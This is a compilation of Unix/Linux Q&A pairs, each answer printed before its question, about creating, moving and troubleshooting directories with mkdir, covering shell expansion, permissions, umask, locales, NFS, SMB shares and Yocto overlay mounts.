I have many files in a folder Main which are named like these: 2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz 2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz 2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz 2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz 2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz 2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz 2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz 2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz 2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gz 2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gzThe first 10 characters shows the date, followed by the digits which is the time in 24 hour format. The rest is the file details which we can ignore. I want to create folders within the Main folder based on the date in the filename and then another folder inside the date folder based on the hour in file name. Eventually I want to move the files from the Main folder into the respective hour folder. Main -> Date -> hh -> file.csv.gzFor eg: The file 2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz in the Main folder will eventually end up in a folder like this with the below path Main/2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz Can you please help with the bash script to achieve the grouping of files in folders like mentioned above?
Creating and arranging files into folders based on date and time in file name
~ doesn’t have a special meaning when it’s quoted. Thus to enter your new directory: cd "~"And to fix your initial mkdir: mkdir -p ~/.aa/.bb
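And to get rid of the accidentally created directory named ~, keep it quoted (or prefix it with ./) so the shell does not expand it to your real home directory:
rm -ri -- './~'    # interactive removal of the stray directory literally named ~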
I want to create the nested folder .aa/.bb in the current user root's home directory. So I use the command mkdir -p "~/.aa/.bb/". But it doesn't work as I expected and it created a folder ~, which I don't know how to enter into. Below is my testing. root@u2004:~# pwd /root root@u2004:~# ls -la total 28 drwx------ 3 root root 4096 Aug 28 14:46 . drwxr-xr-x 20 root root 4096 Aug 28 01:22 .. -rw------- 1 root root 3285 Aug 28 21:56 .bash_history -rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc drwx------ 2 root root 4096 Aug 1 00:31 .cache -rw-r--r-- 1 root root 161 Dec 5 2019 .profile -rwxr-xr-x 1 root root 89 Aug 28 14:46 setproxy.sh root@u2004:~# mkdir -p "~/.aa/.bb/" root@u2004:~# ls -la total 32 drwx------ 4 root root 4096 Aug 28 21:59 . drwxr-xr-x 20 root root 4096 Aug 28 01:22 .. drwxr-xr-x 3 root root 4096 Aug 28 21:59 '~' <-------------------- -rw------- 1 root root 3285 Aug 28 21:56 .bash_history -rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc drwx------ 2 root root 4096 Aug 1 00:31 .cache -rw-r--r-- 1 root root 161 Dec 5 2019 .profile -rwxr-xr-x 1 root root 89 Aug 28 14:46 setproxy.sh root@u2004:~# root@u2004:~# cat /etc/*release* DISTRIB_ID=Ubuntu DISTRIB_RELEASE=20.04 DISTRIB_CODENAME=focal DISTRIB_DESCRIPTION="Ubuntu 20.04.1 LTS" NAME="Ubuntu" VERSION="20.04.1 LTS (Focal Fossa)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 20.04.1 LTS" VERSION_ID="20.04" HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" VERSION_CODENAME=focal UBUNTU_CODENAME=focal root@u2004:~# Any ideas?
How to create nested folders (start with .) properly?
This zsh script will pick up the two newest (plain) files in the current directory, gather the modification timestamp of the most recent one, convert that timestamp to YYYYmmdd format, create the directory, then copy those two newest files into that directory: #!/bin/zshnewest2=( *(.om[1,2]) ) dsec=$( stat -c %Y "${newest2[1]}" ) dnam=$( date -d @"$dsec" +%Y%m%d ) mkdir "$dnam" cp -- "${newest2[@]}" "$dnam"The first line, assigning newest2, expands the * wildcard with a qualifier (in parenthesis). The qualifier asks for:. -- plain files om -- ordered by modification time (newest to oldeset) [1,2] -- slice the list to include only elements 1 through 2We then ask stat for the modification time in seconds of the newest file; that date is passed in to GNU date, who returns the directory name in the format we want. After creating the directory, the cp command copies the two files into that directory.
I am trying to create a directory based on the timestamp of the 2 newest files in a directory and then copy those 2 files into the newly created directory. So for example -rw-r--r-- 1 root root 0 Sep 24 12:01 a-rw-r--r-- 1 root root 0 Sep 24 12:01 bI want to create a directory called 20190924 and copy a and b, the newest files in the current directory, into it
Create directory with timestamp of newest files
This is due to "root squash" on the NFS server. From the exports(5) man page (emphasis mine):nfsd bases its access control to files on the server machine on the uid and gid provided in each NFS RPC request. The normal behavior a user would expect is that she can access her files on the server just as she would on a normal file system. This requires that the same uids and gids are used on the client and the server machine. This is not always true, nor is it always desirable. Very often, it is not desirable that the root user on a client machine is also treated as root when accessing files on the NFS server. To this end, uid 0 is normally mapped to a different id: the so-called anonymous or nobody uid. This mode of operation (called 'root squashing') is the default, and can be turned off with no_root_squash.To paraphrase, it's generally a security risk to allow root (e.g., when running sudo) on the NFS client to modify files and file attributes as if it were root on the NFS server. This would effectively make root on the client equivalent to root on the server, and allow a rogue client to take over the server. From the RHEL 6 security guide:If no_root_squash is used, remote root users are able to change any file on the shared file system and leave applications infected by Trojans for other users to inadvertently execute.
I've written a script that copies some files from one place to another and since I don't have permissions to the source folder, I tried running it with sudo. The problem is that now the creation of the destination folders fails. Here is a simple test case: In my home directory the following works: mkdir testDirBut this fails due to permission denied error sudo mkdir testDir2My home directory has 755 permissions and is own by me. I ran sudo groups and found that as expected the root group is there, but strangely, the users is not. Also running groups as myself reveals that I'm not in the sudo group. Any ideas what's going on? Why am I not able to write to my home folder when running with sudo?
Sudo mkdir fails due to permission denied error
You’ve cleared the executable permission for the file’s owner, but not for members of its group or other users. As a result, the only user denied access by the permissions is root; every other user is granted permission. (root can still execute the binary, because root can execute any binary with any one of its executable bits set.) The setuid bit doesn’t affect how permissions are granted or denied; it only affects the effective uid of processes when they execute the binary. See Understanding UNIX permissions and file types and Restrictive "group" permissions but open "world" permissions? for details.
I am setting the setuid bit on mkdir without making it executable for its owner. chmod u+s /usr/bin/mkdirchmod u-x /usr/bin/mkdir[root@rhel-85 /]# ls -l /usr/bin/mkdir -rwSr-xr-x. 1 root root 84664 Jul 9 2021 /usr/bin/mkdirNow, when I log in as another user "user1" I am still able to create a directory even though the "mkdir" binary is non-executable. My understanding is that "user1" should not be able to create a directory because mkdir is non-executable.
Setting setuid on `mkdir` without making it executable
You could cd into folderA and run the command from there: cd folderA find . \( -type d -o -type f \) -exec bash -c ' for path; do mkdir -p "/path/to/folderB/${path/file/folder}"; done ' bash {} +The parentheses are needed so that the -exec action applies to both branches; without them it only binds to -type f. The parameter expansion ${path/file/folder} renames each fileXY to folderXY. If every folder contains files, you can drop the \( -type d -o ... \) grouping and keep just -type f, since mkdir -p creates the parent directories anyway.
| folderA1 | fileA11, fileA12, ... folderA | folderA2 | fileA21, fileA22... | ... | ... I want to make a copy of it represented as: | folderA1 | folderA11, folderA12, ... folderB | folderA2 | folderA21, folderA22, ... | ... | ...The original folderA (and it's structure) remains as it is (unchanged). I'm trying to create a folder in (folder) B for each file in a (folder) A without the folder itself. I also would like to maintain the directory structure of the original folder (A). Using this question I'm able to achieve the generation of the above but it contains the folder A itself. find source/. -type d -exec mkdir -p dest/{} \; \ -o -type f -exec mkdir -p dest/{} \;Looks like: | | folderA1 | folderA11, folderA12, ... folderB | folderA | folderA2 | folderA21, folderA22, ... | | ...
Create a folder for each file in a folder without the folder itself
$_ - Gives the last argument to the previous command. At shell startup, it gives the absolute filename of the shell or script being executed. When you execute mkdir test mv file.c $_and it misbehaves like this, check whether your mv and cp are aliases or functions. In bash, to access the last argument of the previous command from history, use !:$, like: > mkdir test > mv file.c !:$ mv file.c test
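A quick way to check for that is:
type cp mv mkdir    # reports whether each is an alias, a shell function or a plain binary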
I have a problem with the $_ special parameter in the terminal, which expands to the last argument of the previous command: it does not work with the cp and mv commands in gnome-terminal. It happens when I create a folder and then mv or cp a file with $_, like below:
mkdir test
cp file.c $_
Instead of copying the file to the destination, it creates a file in the current directory named _filedir. The same happens with the mv command:
mkdir test
mv file.c $_
Instead of moving the file to the destination, it is renamed to _filedir. To find the problem I used echo:
$ mkdir test
$ echo $_
_filedir
Why is $_ not working with the cp and mv commands?
$_ not working with copy and move commands
Try this:
IFS= read -r -p "Folder name: " dir
mkdir -p "/foo/${dir}/"{mailserver,dnsserver,minecraftserver,syslogserver}
I use SCP a lot to transfer log files from servers to a jumpbox where I can analyse and troubleshoot, etc. If I have a cluster of servers and I want to create a set of subdirectories, I do it like this:
mkdir -p /foo/bar-nnn/{mailserver,dnsserver,minecraftserver,syslogserver}
Let's say 'bar-nnn' is a reference of sorts, be that a ticket number or incident etc. What I want to be able to do is run a script or a shell command which will prompt me for what 'bar-nnn' should be, then go and create all the subfolders required. I'm pretty sure I'm going to need a for loop but can't quite get my head around it.
Create subdirectories under a parent but prompt for the name of the parent
I ended up using the overlayfs-etc.bbclass feature from Yocto instead, which is available since Yocto 4.0. Documentation at: https://docs.yoctoproject.org/ref-manual/classes.html#ref-classes-overlayfs-etc
The bbclass patches the init process in /sbin/init to create the folders at runtime before mounting the overlay. See: https://git.yoctoproject.org/poky/plain/meta/files/overlayfs-etc-preinit.sh.in
Adding it to your image is really simple. Add to your machine.conf:
OVERLAYFS_ETC_MOUNT_POINT = "/data_local"
OVERLAYFS_ETC_DEVICE = "/dev/mmcblk0p6"
OVERLAYFS_ETC_FSTYPE = "ext4"
OVERLAYFS_ETC_MOUNT_OPTIONS = "defaults,sync"
Add to your image:
IMAGE_FEATURES:append = " overlayfs-etc"
Of course you must make sure your boot medium has an extra read-write mounted partition already available (in the image flashed to the SD card) - in my case mmcblk0p6.
On an embedded device based on Yocto Linux my rootfs is RO, while I have an additional partition for RW data. Now I want to automount at boot an overlay onto /etc stored on a different partition. Here is my fstab: /dev/mmcblk0p6 /data_local ext4 defaults,sync,noexec,rw 0 2 [...] overlay /etc overlay defaults,lowerdir=/etc,upperdir=/data_local/overlayfs/upper/etc,workdir=/data_local/overlayfs/workdir,X-mount.mkdir,x-systemd.requires=/data_local,x-systemd.before=local-fs.target,x-systemd.before=systemd-networkd 0 0However, this fails because the upperdir and workdir directories are missing on first boot. How can I let fstab or systemd.mount automatically create these directories?
fstab and systemd automount overlay
You're nearly there. What you're missing is that you also need to try to strip the bracketed number from the filename to derive the directory:
#!/bin/sh
for file in *.txt
do
    dir="${file%.txt}"      # Remove suffix
    dir="${dir%(*)}"        # Remove bracketed suffix if present
    mkdir -p -- "$dir"      # Create if necessary
    mv -f -- "$file" "$dir" # Move the file
done
You can prefix the mkdir and mv with echo to see what would happen before you action it.
My question is a bit different from: Create directory using filenames and move the files to its respective folder, since in the same folder I have two similar copies of each file, like 001.txt and 001(1).txt ... 100.txt and 100(1).txt. For each pair of similar copies, I want to create one folder and move both copies into it, e.g. 001.txt and 001(1).txt into the folder 001. I based this on the above question, but it doesn't work. The command from the above question:
set -o errexit -o nounset
cd ~/myfolder
for file in *.txt
do
    dir="${file%.txt}"
    mkdir -- "$dir"
    mv -- "$file" "$dir"
done
I have tried:
set -o errexit -o nounset
cd ~/myfolder
for file in *(1).txt
do
    dir="${file%.txt}"
    mkdir -- "$dir"
    mv -- "$file" "$dir"
done
This command will create a folder for each file. Any suggestion to distinguish files like 001.txt and 001(1).txt, so we can select the desired file to create one folder, then run another command to achieve the same goal?
Create directory using filenames and move the files to its respective folder
I found the answer:
tsudo mount -o remount,rw /
(tsudo is the sudo for Termux.)
When I run make install for reaver in Termux, the following error occurs:
./install.sh -D -m 755 wash /usr/local/bin/wash
mkdir: cannot create directory ‘/usr’: Read-only file system
make: *** [Makefile:140: install] Error 1
I tried mount -o remount,rw /system:
mount: '/system' not in /proc/mounts
I also tried mount -o rw,remount /:
mount: '/dev/block/platform/soc/7824900.sdhci/by-name/system' not user mountable in fstab
None of them helped.
Can't mount /system read-write
By default, ranger's :mkdir doesn't accept flags (I tried to pass them, and it doesn't work). But ranger provides aliases:
alias [newcommand] [oldcommand]
    Copies the oldcommand as newcommand.
So when you launch ranger you can set one up to execute mkdir with the flags you need:
:alias mkdir shell mkdir -p
And then you can do:
:mkdir dir1 dir2 dir3
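If you want the alias to survive restarts, the same line can go into ranger's configuration file (assuming a default setup where it lives at ~/.config/ranger/rc.conf):
alias mkdir shell mkdir -p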
As in the equivalent of mkdir dir1 dir2 when running in bash. This creates two separate directories, dir1 and dir2. If you run :mkdir dir1 dir2 in ranger, it simply creates a directory called 'dir1 dir2'.
How to create multiple directories in Ranger?
With the input you have provided I was able to accomplish this with the following command:
while read -r dir; do mkdir -p ./"$dir"; done< <(sed 's@ > @/@g' input)
You can replace ./ with the directory path you would like the directory tree to start in, if not the current directory. This uses sed to convert your input lines from something like:
ALFA ROMEO > 147 > Scheinwerferblenden
to:
ALFA ROMEO/147/Scheinwerferblenden
Then it feeds this output to a while loop that uses mkdir -p to create the directory tree.
$ cat input
ALFA ROMEO > 147 > Scheinwerferblenden
ALFA ROMEO > 156 > Scheinwerferblenden
ALFA ROMEO > 156 > Kühlergrill
AUDI > 80 B3 > Heckspoiler
$ while read -r dir; do mkdir -p ./"$dir"; done< <(sed 's@ > @/@g' input)
$ tree
.
├── ALFA\ ROMEO
│   ├── 147
│   │   └── Scheinwerferblenden
│   └── 156
│       ├── K\303\274hlergrill
│       └── Scheinwerferblenden
├── AUDI
│   └── 80\ B3
│       └── Heckspoiler
└── input
9 directories, 1 file
I have an Excel file which I will convert to a CSV or TXT file with the following data:
ALFA ROMEO > 147 > Scheinwerferblenden
ALFA ROMEO > 156 > Scheinwerferblenden
ALFA ROMEO > 156 > Kühlergrill
AUDI > 80 B3 > Heckspoiler
...and so on. I need to create folders and subfolders based on this data with the following structure:
├───ALFA ROMEO
│   ├───147
│   │   └───Scheinwerferblenden
│   └───156
│       ├───Scheinwerferblenden
│       └───Kühlergrill
│
└───AUDI
    └───80 B3
        └───Heckspoiler
I tried to write mkdir -p bash scripts but with no success.
Create folders and subfolders from csv/txt file
The line
rsync -azv --progress /mnt/data/seafile/ $FOLDER_PATH
may be resetting the timestamp of the backup folder to that of /mnt/data/seafile, because the -a option preserves modification times. You can work around this by running touch $FOLDER_PATH after the rsync.
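If it helps, a minimal sketch of where that would go in the script, using the same variables as above:
rsync -azv --progress /mnt/data/seafile/ $FOLDER_PATH | tee -a $LOG_PATH
touch $FOLDER_PATH   # reset the backup folder's mtime to now so the age-based cleanup sees the right date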
I have the following script: #------------------------ SETTINGS FOLDER_NAME="$(date '+%Y_%b_%d')" LOG_PATH=/home/alex/logs/backup-seafile-$FOLDER_NAME.log DIR_PATH=/mnt/data/Backups/Seafile FOLDER_PATH=$DIR_PATH/$FOLDER_NAMEecho "--------------------------------------------" >> $LOG_PATH echo "[$(date '+%Y %b %d %H:%M:%S')] Running Seafile backup" | tee -a $LOG_PATHecho "[$(date '+%Y %b %d %H:%M:%S')] Deleting old backups..." | tee -a $LOG_PATH #find $DIR_PATH/* -type d -ctime +7 -print -exec rm -rf {} \; >> $LOG_PATHecho "[$(date '+%Y %b %d %H:%M:%S')] Stopping seafile..." | tee -a $LOG_PATH /opt/seafile/seafile-server-latest/seafile.sh stop /opt/seafile/seafile-server-latest/seahub.sh stopecho "[$(date '+%Y %b %d %H:%M:%S')] Collecting garbage..." | tee -a $LOG_PATH /opt/seafile/seafile-server-latest/seaf-gc.shecho "[$(date '+%Y %b %d %H:%M:%S')] Creating backup folder..." | tee -a $LOG_PATH mkdir $FOLDER_PATHecho "[$(date '+%Y %b %d %H:%M:%S')] Databases..." | tee -a $LOG_PATH mysqldump -h localhost -uUSER -pPASSWORD --opt ccnet-db > $FOLDER_PATH/ccnet-db.sql mysqldump -h localhost -uUSER -pPASSWORD --opt seafile-db > $FOLDER_PATH/seafile-db.sql mysqldump -h localhost -uUSER -pPASSWORD --opt seahub-db > $FOLDER_PATH/seahub-db.sqlecho "[$(date '+%Y %b %d %H:%M:%S')] Data..." | tee -a $LOG_PATH rsync -azv --progress /mnt/data/seafile/ $FOLDER_PATH | tee -a $LOG_PATHecho "[$(date '+%Y %b %d %H:%M:%S')] Starting seafile..." | tee -a $LOG_PATH /opt/seafile/seafile-server-latest/seafile.sh start /opt/seafile/seafile-server-latest/seahub.sh startecho "[$(date '+%Y %b %d %H:%M:%S')] Backup Complete!" | tee -a $LOG_PATHI recently noticed that I only ever had one folder and realized it was because all of the backups have the same timestamp of a past date, hence being deleted by the commented out line. I have no idea where its getting this date from or how to change it. Running mkdir normally results in a folder with the correct date. What gives?
Folders created with script have wrong modified timestamp
You can't have two files by the same name at the same time, so you'll need to first create the directory under a temporary name, then move the file into it, then rename the directory. Or alternatively rename the file to a temporary name, create the directory, and finally move the file. I see that Nautilus scripts can be written in any language. You can do this with the most pervasive scripting language, /bin/sh.
#!/bin/sh
set -e
for file
do
  case "$file" in
    */*) TMPDIR="${file%/*}"; file="${file##*/}";;
    *) TMPDIR=".";;
  esac
  temp="$(mktemp -d)"
  mv -- "$file" "$temp"
  mv -- "$temp" "$TMPDIR/$file"
done
Explanations:
set -e aborts the script on error.
The for loop iterates over the arguments of the script.
The case block sets TMPDIR to the directory containing the file. It works whether the argument contains a base name or a file path with a directory part.
mktemp -d creates a directory with a random name in $TMPDIR.
First I move the file to the temporary directory, then I rename the directory. This way, if the operation is interrupted in the middle, the file still has its desired name (whereas in the rename-file-to-temp approach there's a point in time when the file has the wrong name).
If you want to remove the file's extension from the directory, change the last mv call to
mv -- "$temp" "$TMPDIR/${file%.*}"
${file%.*} takes the value of file and removes the suffix that matches .*. If the file has no extension, the name is left unchanged.
How can I create a Nautilus script that moves the selected file into a new folder with the same name? My starting point:
/home/user/123
Here 123 is a file with no extension. My goal is to achieve this result:
/home/user/123/123
Here we have the same file 123 inside a new folder also named 123. I can't figure this out, because every attempt I've made gave me the result:
mkdir: cannot create directory `123': File exists
Nautilus-script to move file into same name directory
As pointed out in the comments, the problem was just the display of the folders which was messed up due to badly configured locales. Running locale on the debian system would show (note the warning here):
~> locale
locale: Cannot set LC_ALL to default locale: No such file or directory
LANG=en_US.UTF-8
LANGUAGE=en_US.UTF-8
LC_CTYPE="en_US.UTF-8"
LC_NUMERIC=de_AT.UTF-8
LC_TIME=de_AT.UTF-8
LC_COLLATE="en_US.UTF-8"
LC_MONETARY=de_AT.UTF-8
LC_MESSAGES=en_US.UTF-8
LC_PAPER=de_AT.UTF-8
LC_NAME=de_AT.UTF-8
LC_ADDRESS=de_AT.UTF-8
LC_TELEPHONE=de_AT.UTF-8
LC_MEASUREMENT=de_AT.UTF-8
LC_IDENTIFICATION=de_AT.UTF-8
LC_ALL=
but locale -a only showed
~> locale -a
C
C.UTF-8
en_US.utf8
POSIX
Note that de_AT.UTF-8 is missing in the second list. Running dpkg-reconfigure locales and selecting de_AT.UTF-8 solves the issue.
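A non-interactive alternative on Debian, if you prefer not to use the dpkg-reconfigure dialog (a sketch, assuming root access):
echo 'de_AT.UTF-8 UTF-8' >> /etc/locale.gen   # as root
locale-gen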
I have a system which is set up with Debian. Running the command
mkdir xx_ü
on this system creates a directory called 'xx_'$'\303\274'. Running the same command on a system that is set up with Ubuntu creates a directory called xx_ü, which is what I would need. How do I get the system set up with Debian to create the directory correctly, containing the German umlauts?
Debian system: Linux helios64 5.10.63-rockchip64 #21.08.2 SMP PREEMPT Wed Sep 8 10:57:23 UTC 2021 aarch64 GNU/Linux
Ubuntu system: Linux tikey-TUXEDO 5.13.0-28-generic #31-Ubuntu SMP Thu Jan 13 17:41:06 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Why does mkdir mess up special characters (German umlauts)?
You can list your files into a file (for example with ls > list), then use a read loop over it to build the sub-folders, and then move the files, dispatching each one into the right folder by using its name as a pattern. Here I made a test with empty files (created with touch filename) to demonstrate the method:
bash-4.4$ while read
> do
>   if [ ! -d ${REPLY/_*/} ]; then
>     mkdir ${REPLY/_*/}
>   fi
> done < list
bash-4.4$ # here the directories are made; then use a similar method for moving the files
bash-4.4$ while read; do if [ -f $REPLY ] ; then mv $REPLY ${REPLY/_*/}/${REPLY/*_/} ; fi ; done < list
bash-4.4$ tree
.
├── identifier
│   └── desiredName.m
├── identifier1
│   ├── desirename1.m
│   └── desirename.m
├── identifier2
│   └── desirename2.m
└── list
3 directories, 5 files
bash-4.4$
You can use this directly in the shell or use similar syntax in a script, of course.
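A more compact sketch doing the same without the intermediate list file, assuming the identifier is everything before the first underscore (files with no underscore, like the ones that should not be moved, are left alone):
for f in *_*; do
    [ -f "$f" ] || continue        # skip anything that is not a regular file
    d=${f%%_*}                     # identifier: the part before the first underscore
    mkdir -p "$d"
    mv -- "$f" "$d/${f#*_}"        # move and strip the identifier prefix from the name
done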
As an example, I have a directory with multiple files in this general format: dir1/identifier1_desiredName1.m dir1/identifier1_desiredName2 dir1/identifier1_desiredName3.m dir1/identifier2_desiredName1.m dir1/identifier2_desiredName2.m dir1/identifier3_desiredName1.m dir1/identifier3_desiredName2.m dir1/identifier3_desiredName3 dir1/identifier4_desiredName1.m dir1/identifier4_desiredName2.m dir1/jabberwocky-mimsy-borogoves dir1/other--should-not-be-movedI'm trying to come up with a script that separates the files by the identifier by making a directory using that identifier, and then move files with the same identifier into that directory. By the end of the moving, I would like to have something like: dir1/identifier1/desiredName1.m dir1/identifier1/desiredName2 dir1/identifier1/desiredName3.m dir1/identifier2/desiredName1.m dir1/identifier2/desiredName2.m dir1/identifier3/desiredName1.m dir1/identifier3/desiredName2.m dir1/identifier3/desiredName3 dir1/identifier4/desiredName1.m dir1/identifier4/desiredName2.m dir1/jabberwocky-mimsy-borogoves dir1/other--should-not-be-movedAs of right now, I think that I'm on the right track for the directory making: awk _ {print $1} | uniq | mkdirSyntax probably isn't quite correct, but the general idea is to print out the first column, separated by _, omitting repeats, and then piping those names into mkdir. But then I'm at a loss for moving the files into the directories. I was thinking about using grep similarly (replacing mkdir above and then piping into mv), but I wasn't sure if it would work.
How to make multiple directories and move multiple files
There are multiple problems with your script:
- there has to be a ; between the ] and then (as @heemayl also indicated), or then should be put on a line of its own
- there has to be a space between handouts" and ]
- you should (but this doesn't generate an error) consistently indent, or use the -m option for mkdir (as @skwlisp indicated)
Something like:
if [ -d "/$home/DB_handouts" ]
then
    echo "Directory DB_handouts found"
else
    mkdir -m 777 /$home/DB_handouts
fi
The above of course assumes that /$home exists; the whole thing can be much more easily achieved by using:
mkdir -p -m 777 /$home/DB_handouts
With -p there will be no complaints if the directory already exists.
I have the following bash script: if [ -d "/$home/DB_handouts"] then echo "Directory DB_handouts found" else mkdir /$home/DB_handouts chmod 777 /$home/DB_handouts fiRunning the above code produces an error: ./file.sh: line 12: syntax error near unexpected token `else' ./file.sh: line 12: ` else'How can I fix this?
use of if else in linux to find whether the folder exists or not
You can create the directories while hiding any error related to the directory already existing: for custDir in /media/storage/sqlbackup/CUSTOMER* do mkdir -p "$custDir"/{daily,weekly,monthly} doneYou cannot use /media/storage/sqlbackup/CUSTOMER*/{daily,weekly,monthly} because the {...} sequence is expanded before the wildcard, and a wildcard pattern will only match files/directories that exist.
I have the following directory structure: /media/storage/sqlbackup/CUSTOMER1 /media/storage/sqlbackup/CUSTOMER2 ... /media/storage/sqlbackup/CUSTOMER*Each CUSTOMER* directory may contain subdirectories named daily, weekly, and monthly. If a CUSTOMER* directory does not contain daily OR weekly OR monthly, I want it to be created, if it does, then I want it to remain. Before: CUSTOMER1/daily After: CUSTOMER1/{daily,weekly,monthly} I was trying to do this with clever use of find, but trying to return all that don't match.
Find all directories NOT containing matched subdirectory and create them
Colons aren't valid characters in file and directory names on SMB/CIFS shares; Windows reserves them (for example for drive letters). The failing directory name contains one, which is why mkdir fails.
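Two possible ways around it, sketched with hypothetical names: either drop the reserved character, or, if you mount the share yourself with mount.cifs instead of gvfs, the mapchars mount option can (if I recall correctly) remap such characters transparently.
mkdir "Pretty in Pink - The Original Motion Picture Soundtrack"
sudo mount -t cifs //wdmycloud/family /mnt/family -o mapchars,username=youruser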
I have a network (samba) share mounted at /run/user/1000/gvfs/smb-share:server=wdmycloud,share=family. Most activities work fine within the share - I can move stuff around, create and delete files, etc. However, if I cd into Music/Various Artists (both of which definitely exist) and try to create a specific directory, it fails: $ mkdir "Pretty in Pink: The Original Motion Picture Soundtrack" mkdir: cannot create directory ‘Pretty in Pink: The Original Motion Picture Soundtrack’: No such file or directorymkdir -p also fails: $ mkdir -p "Pretty in Pink: The Original Motion Picture Soundtrack" mkdir: cannot create directory ‘Pretty in Pink: The Original Motion Picture Soundtrack’: No such file or directoryHowever, mkdir functions fine for other directory names: $ mkdir test # no output, directory createdWhat's special about the name Pretty in Pink: The Original Motion Picture Soundtrack that mkdir chokes on it? How can I get around this issue? Please don't judge me for the music, I'm doing this for someone else...
mkdir "No such file or directory" within a directory that exists
By default, mkdir does not create missing intermediate directories. As mentioned in the manual (man mkdir), you can create them with the -p flag:
mkdir -p pionloop/E_0.3
On a Linux machine running CentOS 7.8.2003 I am in a directory Neutrinos. I now do mkdir /pionloop/ and this works. I then go into this new directory pionloop and do mkdir /E_0.3 and this works as well. I thus have as a result a directory Neutrinos/pionloop/E_0.3. Now, starting in Neutrinos, I want to do this in one command and therefore do mkdir /pionloop/E_0.3 and get:
mkdir: cannot create directory ‘/pionloop/E_3.0’: No such file or directory
What is going wrong here?
mkdir error: no such file or directory
If you want to understand why this is, you need to understand the difference between file names (directory entries) and inodes. rm, rmdir and mv act on the directory entry that names the file/directory, not on the underlying inode. If you still have the directory in use (for example because it is your shell's current working directory), its name is removed immediately, but the inode it refers to is not released until every reference to it (open file handles, processes using it as their working directory) is gone. So when you finally cd .. and drop that last reference, the filesystem can reclaim it.
https://en.wikipedia.org/wiki/Inode
http://www.grymoire.com/Unix/Inodes.html
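You can reproduce the effect in a few harmless lines under /tmp:
mkdir /tmp/demo && cd /tmp/demo
rmdir /tmp/demo      # succeeds: the directory entry is removed
pwd                  # the shell still reports /tmp/demo
touch file           # fails with "No such file or directory": nothing new can be created here
cd .. && ls /tmp     # demo is gone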
I created a directory dir on my Desktop, keyed in cd dir to make dir my current directory, and then typed rmdir /home/user_name/Desktop/dir in the terminal from within the dir directory itself. Surprisingly, this removed the dir directory, but when I checked my current working directory using pwd it still showed that I am in the dir directory. So my question is: how is it possible that I am working in a directory that has already been deleted? I am currently working on Ubuntu.
Trying to remove current directory using rmdir
The question you present of using a single mkdir command to do the same as the other steps doesn't really involve changing directories. It ends with cd ../.. which brings you back to the directory you were in at the start. In effect, that sequence of commands creates a directory a, then a directory b within it (in other words, a/b), then a directory c within the just created b (in other words, a/b/c.) You can do the same with a single mkdir command that creates the nested directories after creating their parents: mkdir a a/b a/b/cAnother way is using mkdir's -p option, which will create the parent directories if necessary, so you don't need to specify them: mkdir -p a/b/cThis doesn't answer your question in the title (for mkdir + cd look at the duplicates from the comments), but addresses the question in your text, about the equivalent single mkdir command for that sequence, in which at the end of the sequence the directory is the same as at the start of it.
Quick question: Is it possible to use "mkdir" to make a new directory AND change to that directory at the same time using a single 'mkdir' command? Whole question: I have this question: What single Linux “mkdir” command could replace the sequence of commands? mkdir a cd a mkdir b cd b mkdir c cd ../..My answer is: mkdir a b c && cd cIs there a single "mkdir" command, without using any other commands, perhaps with some flags or something, I can use to make AND change directory at the same time?
Single "mkdir" command to make a new directory and change to that directory at the same time? [duplicate]
As @Tejas mentioned, you need to understand umask and its values for changing the default permissions. I recommend you read this article so you'll understand how to use it properly. In addition, you should know that it's not permanent, so after rebooting your system the umask value you've set will be gone. To set it in a permanent way, you need to write a new umask value in your shell’s configuration file (~/.bashrc which is executed for interactive non-login shells, or ~/.bash_profile which is executed for login shells). Good Luck
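A minimal sketch of both the temporary and the permanent change, assuming bash and a desired default of 755 for new directories:
umask 022                       # effective for the current shell only
mkdir newdir && ls -ld newdir   # now shows drwxr-xr-x
echo 'umask 022' >> ~/.bashrc   # makes it the default for future interactive shells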
Normally when I make a directory with mkdir, the permissions I expect are 751 or 755. However, for some reason, when new files are created, even in a user's home directory, they are set to 700. What controls the default permissions on new files, and what kind of configuration change led to this happening?
Why are group permissions missing on new directories?
You can't mkdir on a raw partition. You need to format it with a filesystem (which is not the same as assigning a partition type) and mount it first.
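A sketch of the usual sequence, assuming /dev/sda4 is the partition shown in Disks and that you are fine with erasing it:
sudo mkfs.ext4 /dev/sda4       # create a filesystem (destroys whatever is on the partition)
sudo mkdir -p /mnt/usb
sudo mount /dev/sda4 /mnt/usb
sudo chown "$USER" /mnt/usb    # optional: let your own user write to it
mkdir /mnt/usb/mydir           # mkdir now works inside the mounted filesystem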
size: 58 GB
contents: unknown
device: /dev/sda4
partition type: basic data
When I ran the format, I selected the type which I expected would result in a Linux type. I found a similar issue from 2019, but fdisk wouldn't run the solution. The file type may be suitable, but I haven't been able to run 'mkdir' on the partition. 'Files' doesn't see the partition under "Other Locations". Suggestions welcome.
/dev/sda4/ on USB stick isn't available after formatting. 'Discs' shows the following:
There appear to be many little things in that code snippet that may be causing confusion. First off, as written, $k can sometimes start with a dot (e.g. .1, .2, etc.), which in Unix makes the directory a hidden directory. The first thing I would check is whether those directories are created as hidden:
ls -A
Second, you are creating the ${k}_${NaMeiFFiLe} in the parent directory, NOT in the new directories that you are creating. Again, since $k starts with a dot in many cases, it may be hidden in the parent directory. Given the flow of your code, I think you meant to save the file within the new sub-directories. If true, that would look something like this (I replaced the regex with ... for simplification):
sed -e '...' "${NaMeoFFiLe}" > "${NaMeDiR}/${k}/${k}_${NaMeoFFiLe}"
